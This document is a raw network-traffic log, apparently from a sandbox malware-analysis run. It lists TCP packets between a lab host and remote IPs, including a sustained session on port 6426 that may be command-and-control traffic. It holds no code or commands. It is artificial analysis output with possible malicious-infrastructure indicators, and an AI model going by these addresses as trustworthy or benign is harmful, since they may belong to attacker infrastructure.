                                                                                                                                          Dec 14, 2024 14:00:43.478537083 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.478741884 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.481676102 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.481770039 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.487694025 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.487775087 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.493863106 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.493947983 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.499174118 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.499255896 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.502054930 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.502268076 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.507889986 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.508011103 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.513619900 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.513711929 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.518064022 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.518188000 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.521034956 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.521152973 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.526860952 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.526953936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.532620907 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.532730103 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.538393974 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.538490057 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.541404963 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.541484118 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.547223091 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.547346115 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.552951097 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.553049088 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.556005001 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.556078911 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.567405939 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.567516088 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.571985960 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.572065115 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.574959993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.575040102 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.579070091 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.579154015 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.640538931 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.640703917 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.651154041 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.727782965 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.727894068 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.731786013 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:47.851557970 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:47.893209934 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.013144970 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:48.013341904 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.013647079 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:48.134224892 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.266374111 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.266513109 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:49.279454947 CET497206426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.337522984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.386053085 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.399288893 CET642649720160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.640609026 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.644867897 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.765516043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:49.765594959 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:49.885454893 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.272416115 CET8049722178.237.33.50192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.272516966 CET4972280192.168.2.12178.237.33.50
                                                                                                                                          Dec 14, 2024 14:00:50.546418905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546541929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546555996 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546611071 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546617985 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.546622992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.546669006 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.815885067 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815906048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815920115 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815932035 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.815992117 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.816538095 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.818783045 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.818897009 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.818949938 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.827395916 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.827415943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.827492952 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:50.836019993 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.836039066 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:50.836117029 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.059935093 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.059993982 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.060045004 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.064131021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.064188004 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.064239025 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.072637081 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.072653055 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.072702885 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.080935955 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.080949068 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.081018925 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.089797020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.089809895 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.089869022 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.097712040 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.097961903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.098051071 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.106224060 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.106266022 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.106322050 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.251966953 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.292301893 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.316871881 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.316919088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.316977978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.320952892 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.321113110 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.321161032 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.329262972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.329334021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.329384089 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.337637901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.337730885 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.337774992 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.345944881 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.345993042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.346051931 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.354187012 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.354257107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.354311943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.362499952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.362590075 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.362648010 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.370950937 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.371009111 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.371056080 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.379137039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.379321098 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.379384995 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.387439013 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.432914972 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.573404074 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.573628902 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.573796034 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.577498913 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.579011917 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.579057932 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.579090118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.583920002 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.583965063 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.584048033 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.592600107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.592652082 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.592735052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.600613117 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.600677967 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.600692987 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.608846903 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.608896017 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.608957052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.617204905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.617265940 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.617295980 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.625520945 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.625580072 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.625648022 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633817911 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633865118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.633898973 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.642205954 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.642257929 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.642268896 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.650513887 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.650563002 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.650583029 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.658821106 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.658870935 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:51.658915043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.667042971 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:51.667102098 CET497216426192.168.2.12160.25.73.25
Dec 14, 2024 14:00:51.830758095 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.830775023 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.830854893 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.833571911 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.833616972 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.833663940 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.838982105 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.839112043 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.839193106 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.844706059 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.844773054 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.844974995 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.850476980 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.850610971 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.850661993 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.856177092 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.856259108 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.856312990 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.861952066 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.862056971 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.862127066 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.867670059 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.867759943 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.867811918 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.873404980 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.873486996 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.873683929 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.879275084 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.879368067 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.879416943 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.884970903 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.885123014 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.885220051 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.890670061 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.890785933 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.890830994 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.896477938 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.896578074 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.896641016 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.902177095 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.902369022 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.902432919 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.907984972 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.908030033 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.908090115 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.913677931 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.913762093 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.913810968 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.919387102 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.919465065 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.919514894 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:51.925139904 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:51.979824066 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.090372086 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.090389967 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.090460062 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.091586113 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.091619968 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.091666937 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.094049931 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.094172001 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.094225883 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.098422050 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.098536015 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.098592997 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.102911949 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.103055954 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.103107929 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.107048035 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.107137918 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.107192039 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.111331940 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.111459970 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.111510992 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.115582943 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.115822077 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.115871906 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.119919062 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.120007038 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.120059013 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.124453068 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.124596119 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.124649048 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.128581047 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.128705025 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.128757954 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.132880926 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.133014917 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.133065939 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.137070894 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.137182951 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.137233019 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.141426086 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.141576052 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.141637087 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.145752907 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.145838976 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.145895004 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.150021076 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.150132895 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.150187016 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.154434919 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.154635906 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.154683113 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.158664942 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.158755064 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.158798933 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.163784027 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.163826942 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.163873911 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.167258978 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.167342901 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.167401075 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.171561003 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.171693087 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.171741009 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.175846100 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.175956964 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.176001072 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.180308104 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.180398941 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.180444956 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.184551954 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.184670925 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.184726000 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.188774109 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.189032078 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.189076900 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.193034887 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.193351030 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.193404913 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.197351933 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.197531939 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.197578907 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.201601028 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.245457888 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.282061100 CET  6426   49721  160.25.73.25  192.168.2.12
